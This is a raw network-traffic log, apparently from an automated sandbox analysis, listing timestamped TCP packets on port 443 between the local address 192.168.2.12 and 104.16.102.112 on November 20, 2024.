                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.915750027 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.915769100 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.915872097 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.915899992 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.916146040 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.916642904 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.916851044 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.916861057 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.917941093 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.918003082 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.918400049 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.918463945 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.918648958 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.923146963 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.923166037 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.923233986 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.923249006 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.923438072 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.930819988 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.930836916 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.930895090 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.930905104 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.930947065 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.930947065 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.938623905 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.938640118 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.938762903 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.938762903 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.938772917 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.939269066 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.945039034 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.945061922 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.945132017 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.945147991 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.945409060 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.950625896 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.950669050 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.950696945 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.950706959 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.950742960 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.958256960 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.958272934 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.958375931 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.958375931 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.958391905 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.963325024 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.965362072 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.965393066 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.010189056 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.010198116 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.099148035 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.099174976 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.099322081 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.099339008 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.099623919 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.106163025 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.106179953 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.106254101 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.106261969 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.106390953 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.109982967 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.110245943 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.110301018 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.110323906 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.112852097 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.112869024 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.113003016 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.113013029 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.113090038 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.118380070 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.118437052 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.118447065 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.120477915 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.120495081 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.120604992 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.120614052 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.120672941 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.127223015 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.127403975 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.127412081 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.128303051 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.128320932 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.128412008 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.128420115 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.128570080 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.134653091 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.134716034 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.134727955 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.136286020 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.136306047 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.136383057 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.136392117 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.136624098 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.143115044 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.143182039 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.143188953 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.143193960 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.143209934 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.143297911 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.143306971 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.143496990 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.149889946 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.149930000 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.149980068 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.149986982 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.150012016 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.150042057 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173648119 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173736095 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173773050 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173775911 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173789024 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173825979 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173827887 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173841000 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173909903 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.173918009 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.181921005 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.181988001 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.181998014 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.187657118 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.192368031 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.192433119 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.192442894 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.199578047 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.199635983 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.199887991 CET49790443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.199898958 CET44349790104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.229602098 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.279577971 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.279603004 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.299233913 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.299261093 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.299333096 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.299354076 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.299751997 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.304527998 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.304580927 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.304603100 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.304627895 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.304641962 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.304806948 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.304806948 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.304991007 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.305007935 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.316641092 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.316687107 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.316741943 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.317159891 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.317173958 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319138050 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319175959 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319231033 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319247007 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319303036 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319339991 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319380999 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319389105 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.319866896 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.326116085 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.326174974 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.326186895 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.326225042 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.326351881 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.327533960 CET49791443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.327550888 CET44349791104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.328710079 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.328818083 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.328825951 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.336440086 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.336498976 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.336508989 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.342490911 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.342746973 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.342776060 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.354269981 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.354332924 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.354362011 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.365277052 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.365370035 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.365423918 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.365447044 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.365804911 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.373404026 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.380677938 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.380768061 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.380790949 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.382977962 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.383070946 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.383132935 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.383174896 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.383179903 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.383189917 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.383213997 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.387525082 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.387583017 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.387605906 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.389978886 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.390012980 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.390053988 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.390081882 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.390127897 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.393765926 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.393845081 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.393867016 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.399373055 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.403727055 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.404019117 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.404038906 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.407727957 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.407761097 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.407792091 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.407810926 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.407850027 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.415714979 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.415793896 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.415793896 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.415829897 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.415879011 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.467462063 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.467509031 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.467578888 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.467820883 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.467844009 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.470660925 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.470698118 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.470860958 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.471050978 CET49796443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.471065998 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.530580997 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.533098936 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.533155918 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.533189058 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.544888020 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.544914007 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.544955969 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.544987917 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.545002937 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.554600000 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.554666042 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.554678917 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.554723978 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.559357882 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.559391975 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.559433937 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.568418026 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.568480015 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.568515062 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.568552017 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.571609974 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.575740099 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.575786114 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.575836897 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.575860977 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.575901985 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.577660084 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.577754021 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.583365917 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.583436012 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.583509922 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.591629028 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.591677904 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.591732979 CET49792443192.168.2.12104.16.102.112
